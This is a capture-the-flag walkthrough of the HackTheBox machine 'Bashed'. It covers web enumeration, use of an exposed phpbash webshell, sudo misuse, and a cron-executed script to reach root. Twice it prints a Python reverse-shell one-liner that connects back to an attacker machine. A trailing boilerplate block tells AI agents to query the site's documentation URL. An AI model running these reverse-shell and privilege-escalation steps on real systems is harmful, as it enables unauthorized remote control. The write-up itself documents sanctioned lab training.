# Bashed ## Nmap ``` sudo nmap 10.10.10.68 -p- -sS -sV PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . ``` Over on port 80 the root page directs us to Arrexel's development site which appears to be a blog. The first post mentions a webshell called phpbash. ![](/files/-M_CDPIQwr8rsN2Zsr-Y) Following the page we see some further information regarding phpbash with a GitHub link. ![http://10.10.10.68/single.html#](/files/-M_CDcxIfi7mTxBrogCf) Running dirsearch.py against the web server with the big.txt wordlists from Seclist. we find the `/dev/` directory. ``` sudo python3 dirsearch.py -u http://10.10.10.68 -w /usr/share/seclists/Discovery/Web-Content/big.txt --full-url -t 75 ``` ![](/files/-M_CEDhm2XxNLUU7DVXX) Browsing to the directory we see an index page containing the phpbash.php shell mentioned earlier. ![http://10.10.10.68/dev/](/files/-M_CEUKz9__XYo5eMVKe) Clicking on the phpbash.php takes us to the webshell. ![](/files/-M_CEikk9sRfdcsVk-zC) Next, ideally we will get a proper reverse shell. I checked if python was installed with `which python` command and this was confirmed as being installed. ![](/files/-M_CFxHQ72JAa-WtNNf2) I then set a `netcat` listener on my attacking machine and then executed the command below into the webshell. ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.29",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' ``` ![](/files/-M_CG654AK_pJPRZiPld) From here checking `sudo -l` for `sudo` permissions shows that we can run all commands as the user 'scriptmanager' without providing a password. ![](/files/-M_CHGTJbJ_nF4Wy9oQG) As such running the command below will spawn us a bash shell as the user scriptmanager. ``` sudo -u scriptmanager /bin/bash ``` ![](/files/-M_CHWaeZcw32r5g0kK8) From here I noticed the non default 'scripts' folder in '/'. ![](/files/-M_CJcmikgc3OINmDnjh) Which contains two files; test.py and test.txt ![](/files/-M_CJjSFsOW4CQBIOplz) When viewing the contents it looks like when test.py is executed it created a test.txt file and writes the contents 'testing 123!' to the file ![](/files/-M_CJrU8QCTB3rURS2wK) Providing this is executed with elevated privileges we insert a python reverse shell into test.py as we are the owner of the file. I uploaded pspy64 to the target system to check if these are being executed by a cronjob. After uploading the binary and setting the correct executable permissions I executed pspy64 and was presented with the following: ![](/files/-M_CKb5G7FNt5voaVlnb) We see that a process is being executed on a regular interval that is executed any file ending in .py. Because we are the owner of test.py I will simply echo out the contents and replace with a python reverse shell. ``` echo > test.py echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.29",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' > test.py ``` I then set a listener to port 53 on my attacking machine and soon after caught a root shell. ![](/files/-M_CLnhasC1AVc2N79QD) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/hackthebox/linux/bashed.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.